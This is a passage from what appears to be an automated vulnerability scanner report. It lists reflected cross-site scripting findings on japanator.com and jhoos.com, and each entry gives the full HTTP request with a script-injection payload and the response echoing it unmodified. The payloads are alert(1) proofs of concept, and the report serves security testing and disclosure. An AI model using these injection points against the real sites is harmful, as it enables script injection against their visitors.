This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant9e6c0"><script>alert(1)</script>555ac0fda78/index_cblogs-mini.phtml?y=community&cblogs=1 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:02:50 GMT
Server: lighttpd/1.4.28
Content-Length: 112292


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant9e6c0"><script>alert(1)</script>555ac0fda78/index_cblogs-mini.phtml?y=community&cblogs=1&start=8&skip=features">
...[SNIP]...

7.63. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/index_cblogs-mini.phtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f287"><script>alert(1)</script>a7d08cc387 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/index_cblogs-mini.phtml6f287"><script>alert(1)</script>a7d08cc387?y=community&cblogs=1 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:03:14 GMT
Server: lighttpd/1.4.28
Content-Length: 112291


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/index_cblogs-mini.phtml6f287"><script>alert(1)</script>a7d08cc387?y=community&cblogs=1&start=8&skip=features">
...[SNIP]...

7.64. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2fa6"><script>alert(1)</script>af94a2890d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephantc2fa6"><script>alert(1)</script>af94a2890d1/login.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:59:49 GMT
Server: lighttpd/1.4.28
Content-Length: 112259


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephantc2fa6"><script>alert(1)</script>af94a2890d1/login.phtml?start=8&skip=features">
...[SNIP]...

7.65. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78865"><script>alert(1)</script>7ffcce37a66c81351 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /elephant78865"><script>alert(1)</script>7ffcce37a66c81351/login.phtml?back_to=&email_address=&password=&login=Login HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
Cache-Control: max-age=0
Origin: http://www.japanator.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:08:06 GMT
Server: lighttpd/1.4.28
Content-Length: 112355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant78865"><script>alert(1)</script>7ffcce37a66c81351/login.phtml?back_to=&email_address=&password=&login=Login&start=8&skip=features">
...[SNIP]...

7.66. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3961b"><script>alert(1)</script>5c60c7d19bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/login.phtml3961b"><script>alert(1)</script>5c60c7d19bc HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:00:10 GMT
Server: lighttpd/1.4.28
Content-Length: 112259


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/login.phtml3961b"><script>alert(1)</script>5c60c7d19bc?start=8&skip=features">
...[SNIP]...

7.67. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f69cc"><script>alert(1)</script>bf717c8e8da60b310 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /elephant/login.phtmlf69cc"><script>alert(1)</script>bf717c8e8da60b310?back_to=&email_address=&password=&login=Login HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
Cache-Control: max-age=0
Origin: http://www.japanator.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:08:29 GMT
Server: lighttpd/1.4.28
Content-Length: 112355


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/login.phtmlf69cc"><script>alert(1)</script>bf717c8e8da60b310?back_to=&email_address=&password=&login=Login&start=8&skip=features">
...[SNIP]...

7.68. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b02ca"><script>alert(1)</script>24e2481c18d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephantb02ca"><script>alert(1)</script>24e2481c18d/signup.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:08:47 GMT
Server: lighttpd/1.4.28
Content-Length: 112304


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephantb02ca"><script>alert(1)</script>24e2481c18d/signup.phtml?start=8&skip=features">
...[SNIP]...

7.69. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12814"><script>alert(1)</script>d51c9eb6be2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/signup.phtml12814"><script>alert(1)</script>d51c9eb6be2 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.3.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:09:10 GMT
Server: lighttpd/1.4.28
Content-Length: 112304


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/signup.phtml12814"><script>alert(1)</script>d51c9eb6be2?start=8&skip=features">
...[SNIP]...

7.70. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49269"><script>alert(1)</script>83ecb4f0d39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant49269"><script>alert(1)</script>83ecb4f0d39/templates/features.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:56:52 GMT
Server: lighttpd/1.4.28
Content-Length: 112282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant49269"><script>alert(1)</script>83ecb4f0d39/templates/features.css?x=05.18.10a&start=8&skip=features">
...[SNIP]...

7.71. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18bd8"><script>alert(1)</script>8bddb78b326 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/templates18bd8"><script>alert(1)</script>8bddb78b326/features.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:15 GMT
Server: lighttpd/1.4.28
Content-Length: 112282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/templates18bd8"><script>alert(1)</script>8bddb78b326/features.css?x=05.18.10a&start=8&skip=features">
...[SNIP]...

7.72. http://www.japanator.com/elephant/templates/features.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/features.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a879d"><script>alert(1)</script>cba7f3ca990 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/templates/features.cssa879d"><script>alert(1)</script>cba7f3ca990?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:40 GMT
Server: lighttpd/1.4.28
Content-Length: 112282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/templates/features.cssa879d"><script>alert(1)</script>cba7f3ca990?x=05.18.10a&start=8&skip=features">
...[SNIP]...

7.73. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90f24"><script>alert(1)</script>50354e47f21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant90f24"><script>alert(1)</script>50354e47f21/templates/styles2011.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:56:54 GMT
Server: lighttpd/1.4.28
Content-Length: 112284


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant90f24"><script>alert(1)</script>50354e47f21/templates/styles2011.css?x=05.18.10a&start=8&skip=features">
...[SNIP]...

7.74. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c144"><script>alert(1)</script>851007136eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/templates2c144"><script>alert(1)</script>851007136eb/styles2011.css?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:16 GMT
Server: lighttpd/1.4.28
Content-Length: 112284


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/templates2c144"><script>alert(1)</script>851007136eb/styles2011.css?x=05.18.10a&start=8&skip=features">
...[SNIP]...

7.75. http://www.japanator.com/elephant/templates/styles2011.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /elephant/templates/styles2011.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 939e9"><script>alert(1)</script>da3114cdcf2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /elephant/templates/styles2011.css939e9"><script>alert(1)</script>da3114cdcf2?x=05.18.10a HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:57:40 GMT
Server: lighttpd/1.4.28
Content-Length: 112284


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/elephant/templates/styles2011.css939e9"><script>alert(1)</script>da3114cdcf2?x=05.18.10a&start=8&skip=features">
...[SNIP]...

7.76. http://www.japanator.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.japanator.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c63b"><script>alert(1)</script>46c4dffc34d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4c63b"><script>alert(1)</script>46c4dffc34d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.japanator.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 00:15:04 GMT
Server: lighttpd/1.4.28
Content-Length: 112248


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/favicon.ico4c63b"><script>alert(1)</script>46c4dffc34d?start=8&skip=features">
...[SNIP]...

7.77. http://www.jhoos.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jhoos.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9bd4"-alert(1)-"de46a400726 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icof9bd4"-alert(1)-"de46a400726 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jhoos.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Set-Cookie: PHPSESSID=g0ij568rmka3ulclrpt5nhoec4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="http://www.jhoos.com/w3c/p3p.xml", CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-type: text/html
Date: Sun, 01 May 2011 23:37:17 GMT
Server: lighttpd/1.4.28-devel-485M
Content-Length: 6926

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<TITLE>Social Networking Services in Favicon.icof9bd4"-alert(1)-"de46a400726</TITLE>
<meta name="description" content="Jho
...[SNIP]...
<script type="text/javascript">
function vp(uname)
{
   window.location.href = "http://profiles.jhoos.com/"+uname;
}
function pg(pg)
{
   window.location.href = "http://www.jhoos.com/favicon.icof9bd4"-alert(1)-"de46a400726--"+pg;
}
</script>
...[SNIP]...

7.78. http://www.jhoos.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jhoos.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17e5b<a>fb17bacaecf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

